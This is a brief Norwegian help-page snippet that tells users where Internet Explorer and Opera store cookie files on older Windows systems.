Internet Explorer lagrer disse informasjonskapslene som separate tekstfiler i mappen C:Documents and Settings UsernameCookies
Opera lagrer informasjonskapsler i filen C:Documents and SettingsBrukernavnApplication DataOperaOperaprofilecookies4.dat


Lukk